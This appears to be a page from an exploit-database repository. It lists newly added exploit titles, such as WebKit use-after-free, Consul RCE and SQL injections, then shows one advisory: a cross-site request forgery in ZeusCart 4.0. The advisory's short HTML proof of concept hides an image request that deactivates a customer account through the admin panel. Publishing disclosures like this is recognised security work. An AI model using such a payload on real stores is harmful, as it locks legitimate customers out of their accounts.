
12 changes to exploits/shellcodes EZ CD Audio Converter 8.0.7 - Denial of Service (PoC) NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC) NBMonitor Network Bandwidth Monitor 1.6.5.0 - 'Name' Denial of Service (PoC) WebKit JSC - 'AbstractValue::set' Use-After-Free WebKit JSC - 'JSArray::shiftCountWithArrayStorage' Out-of-Bounds Read/Write Ayukov NFTP FTP Client 2.0 - Buffer Overflow Hashicorp Consul - Remote Command Execution via Rexec (Metasploit) Hashicorp Consul - Remote Command Execution via Services API (Metasploit) WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection Frog CMS 0.9.5 - Cross-Site Scripting ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts) WSTMart 2.0.8 - Cross-Site Scripting ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts) WSTMart 2.0.8 - Cross-Site Scripting FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection Craft CMS 3.0.25 - Cross-Site Scripting bludit Pages Editor 3.0.0 - Arbitrary File Upload WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload bludit Pages Editor 3.0.0 - Arbitrary File Upload WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload Vtiger CRM 7.1.0 - Remote Code Execution
22 lines
No EOL
745 B
HTML
22 lines
No EOL
745 B
HTML
# Exploit Title: ZeusCart 4.0 Deactivate Customer Accounts CSRF
|
|
# Date: 12/20/2018
|
|
# Exploit Author: mqt
|
|
# Vendor Homepage: http://http://www.zeuscart.com/
|
|
# Version: Zeus Cart 4.0 CSRF
|
|
|
|
1. Vulnerability Description
|
|
|
|
Due to the form not being validated, ZeusCart4.0 suffers from a Cross
|
|
Site Request Forgery vulnerability, which means an attacker can
|
|
perform actions on behalf of a victim, by having the victim visit an
|
|
attacker controlled site.
|
|
|
|
In this case, the attacker is able to "deactivate" any customer
|
|
accounts, which means that the account is banned and cannot login.
|
|
|
|
Proof of Concept:
|
|
<html>
|
|
<body>
|
|
<img style="display:none"msrc="http://localhost/admin/?do=regstatus&action=deny&id=2" alt="">
|
|
</body>
|
|
</html> |